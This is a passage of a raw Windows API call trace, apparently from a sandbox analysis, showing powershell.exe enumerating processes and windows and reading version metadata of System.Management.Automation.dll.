lpcbNeeded=0xcdee8 | out: lphModule=0x2c0ab70, lpcbNeeded=0xcdee8) returned 1 [0054.770] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f7f0000, lpmodinfo=0x2c0ade0, cb=0x18 | out: lpmodinfo=0x2c0ade0*(lpBaseOfDll=0x13f7f0000, SizeOfImage=0x77000, EntryPoint=0x13f7fc63c)) returned 1 [0054.770] CoTaskMemAlloc (cb=0x804) returned 0x328520 [0054.770] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f7f0000, lpBaseName=0x328520, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0054.771] CoTaskMemFree (pv=0x328520) [0054.771] CoTaskMemAlloc (cb=0x804) returned 0x328520 [0054.771] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f7f0000, lpFilename=0x328520, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0054.771] CoTaskMemFree (pv=0x328520) [0054.772] CloseHandle (hObject=0x2f0) returned 1 [0054.779] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa80) returned 0x2f0 [0054.779] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0xce018 | out: lpExitCode=0xce018*=0x103) returned 1 [0054.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b088, Length=0x20000, ResultLength=0xcdfe0 | out: SystemInformation=0x12c0b088, ResultLength=0xcdfe0*=0xcfa8) returned 0x0 [0054.798] EnumWindows (lpEnumFunc=0x2ab66ac, lParam=0x0) returned 1 [0054.799] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6d4 [0054.799] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x32c [0054.799] GetWindowThreadProcessId (in: hWnd=0x200cc, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.799] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.799] GetWindowThreadProcessId (in: hWnd=0x200e0, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.799] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.799] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x3a0 [0054.800] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.800] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0xa64 [0054.800] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.801] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.802] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.802] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x900 [0054.802] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.802] GetWindowThreadProcessId (in: hWnd=0x5019a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.802] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x530 [0054.802] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x678 [0054.802] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7e0 [0054.802] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x4fc [0054.802] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x28c [0054.802] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x560 [0054.802] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x2b0 [0054.802] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x5c4 [0054.803] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7c8 [0054.803] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x214 [0054.803] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x460 [0054.803] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7f8 [0054.803] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x90 [0054.803] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x730 [0054.803] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x228 [0054.803] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x35c [0054.803] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7a0 [0054.803] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x670 [0054.803] GetWindowThreadProcessId (in: hWnd=0x60118, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x348 [0054.803] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6a4 [0054.803] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6d4 [0054.804] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6b0 [0054.804] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6d4 [0054.804] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6b0 [0054.804] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6d4 [0054.804] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6a4 [0054.804] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6a4 [0054.804] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.804] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.804] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.804] GetWindowThreadProcessId (in: hWnd=0x200b4, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.804] GetWindowThreadProcessId (in: hWnd=0x200bc, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.804] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.804] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.805] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x54c [0054.805] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x43c [0054.805] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x5a4 [0054.805] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x588 [0054.805] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x3a0 [0054.805] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x544 [0054.805] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.805] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x518 [0054.805] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.805] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x4f0 [0054.805] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.805] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.805] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x66c [0054.806] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.806] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.806] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x3a0 [0054.806] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x3a0 [0054.806] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x124 [0054.806] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x688 [0054.806] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x3a0 [0054.806] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x32c [0054.806] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.806] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x428 [0054.806] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0xa78 [0054.806] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.807] GetWindowThreadProcessId (in: hWnd=0x301a2, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x8c0 [0054.807] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x530 [0054.807] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x678 [0054.807] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7e0 [0054.807] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x4fc [0054.807] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x28c [0054.807] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x560 [0054.807] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x2b0 [0054.807] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x5c4 [0054.807] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7c8 [0054.807] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x214 [0054.807] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x460 [0054.807] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7f8 [0054.808] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x90 [0054.808] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x730 [0054.808] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x228 [0054.808] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x35c [0054.808] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x7a0 [0054.808] GetWindowThreadProcessId (in: hWnd=0x90154, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x670 [0054.808] GetWindowThreadProcessId (in: hWnd=0x3010e, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x348 [0054.808] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6b0 [0054.808] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6d4 [0054.808] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x6a4 [0054.808] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x54c [0054.808] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x43c [0054.808] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x5a4 [0054.809] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x4f0 [0054.809] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x66c [0054.809] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x3a0 [0054.809] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x3a0 [0054.809] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0xcdd40 | out: lpdwProcessId=0xcdd40) returned 0x688 [0054.812] WerSetFlags () returned 0x0 [0054.818] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0054.819] CoTaskMemFree (pv=0x0) [0054.820] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce0a0 | out: pulNumLanguages=0xce0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce0a0) returned 1 [0054.820] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce0a8, pwszLanguagesBuffer=0x2c27cc0, pcchLanguagesBuffer=0xce0a0 | out: pulNumLanguages=0xce0a8, pwszLanguagesBuffer=0x2c27cc0, pcchLanguagesBuffer=0xce0a0) returned 1 [0054.824] CoTaskMemAlloc (cb=0x24) returned 0x318700 [0054.824] GetUserDefaultLocaleName (in: lpLocaleName=0x318700, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0054.824] CoTaskMemFree (pv=0x318700) [0054.841] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0054.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.842] CoTaskMemFree (pv=0x32a5c0) [0054.843] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0054.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.844] CoTaskMemFree (pv=0x32a5c0) [0054.846] CoTaskMemAlloc (cb=0x104) returned 0x32a5c0 [0054.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32a5c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.846] CoTaskMemFree (pv=0x32a5c0) [0054.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcda70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.854] SetErrorMode (uMode=0x1) returned 0x1 [0054.854] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdd20 | out: lpFileInformation=0xcdd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0054.854] SetErrorMode (uMode=0x1) returned 0x1 [0054.854] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdf90 | out: lpdwHandle=0xcdf90) returned 0x94c [0054.855] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c2b550 | out: lpData=0x2c2b550) returned 1 [0054.856] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdf08, puLen=0xcdf00 | out: lplpBuffer=0xcdf08*=0x2c2b5ec, puLen=0xcdf00) returned 1 [0054.856] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b6c8, puLen=0xcde70) returned 1 [0054.856] lstrlenW (lpString="Microsoft Corporation") returned 21 [0054.856] CoTaskMemAlloc (cb=0x2e) returned 0x274d00 [0054.856] lstrcpyW (in: lpString1=0x274d00, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0054.856] CoTaskMemFree (pv=0x274d00) [0054.856] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b71c, puLen=0xcde70) returned 1 [0054.856] lstrlenW (lpString="System.Management.Automation") returned 28 [0054.856] CoTaskMemAlloc (cb=0x3c) returned 0x3288c0 [0054.856] lstrcpyW (in: lpString1=0x3288c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0054.856] CoTaskMemFree (pv=0x3288c0) [0054.857] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b778, puLen=0xcde70) returned 1 [0054.857] lstrlenW (lpString="6.1.7601.17514") returned 14 [0054.857] CoTaskMemAlloc (cb=0x20) returned 0x322030 [0054.857] lstrcpyW (in: lpString1=0x322030, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0054.857] CoTaskMemFree (pv=0x322030) [0054.857] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b7b8, puLen=0xcde70) returned 1 [0054.857] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0054.857] CoTaskMemAlloc (cb=0x44) returned 0x3288c0 [0054.857] lstrcpyW (in: lpString1=0x3288c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0054.857] CoTaskMemFree (pv=0x3288c0) [0054.857] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b820, puLen=0xcde70) returned 1 [0054.857] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0054.857] CoTaskMemAlloc (cb=0x76) returned 0x2caec0 [0054.857] lstrcpyW (in: lpString1=0x2caec0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0054.857] CoTaskMemFree (pv=0x2caec0) [0054.857] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b8bc, puLen=0xcde70) returned 1 [0054.857] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0054.857] CoTaskMemAlloc (cb=0x44) returned 0x3288c0 [0054.857] lstrcpyW (in: lpString1=0x3288c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0054.857] CoTaskMemFree (pv=0x3288c0) [0054.857] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b920, puLen=0xcde70) returned 1 [0054.857] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0054.857] CoTaskMemAlloc (cb=0x58) returned 0x27dab0 [0054.857] lstrcpyW (in: lpString1=0x27dab0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0054.857] CoTaskMemFree (pv=0x27dab0) [0054.857] VerQueryValueW (in: pBlock=0x2c2b550, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcde78, puLen=0xcde70 | out: lplpBuffer=0xcde78*=0x2c2b99c, puLen=0xcde70) returned 1 [0054.857] lstrlenW (lpString="6.1.7601.17514") returned 14 [0054.857] CoTaskMemAlloc (cb=0x20) returned 